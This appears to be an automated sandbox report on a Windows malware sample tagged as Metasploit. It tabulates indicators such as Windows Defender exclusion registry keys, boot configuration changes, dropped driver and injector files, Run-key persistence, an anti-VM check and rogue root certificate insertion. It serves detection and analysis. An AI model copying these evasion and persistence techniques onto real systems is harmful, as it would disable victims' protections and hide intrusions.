| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
MetaSploit
Metasploit family
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\6c5db6dce13ded4e0e6c7e9a526b063e.exe = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\RedPond = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\Winmon.sys | C:\Windows\rss\csrss.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\RedPond = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\6c5db6dce13ded4e0e6c7e9a526b063e.exe = "0" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\RedPond = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
Checks installed software on the system
Manipulates WinMon driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMon | C:\Windows\rss\csrss.exe | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Logs\CBS\CbsPersist_20241108090850.cab | C:\Windows\system32\makecab.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\rss\csrss.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Windows\rss\csrss.exe | N/A |
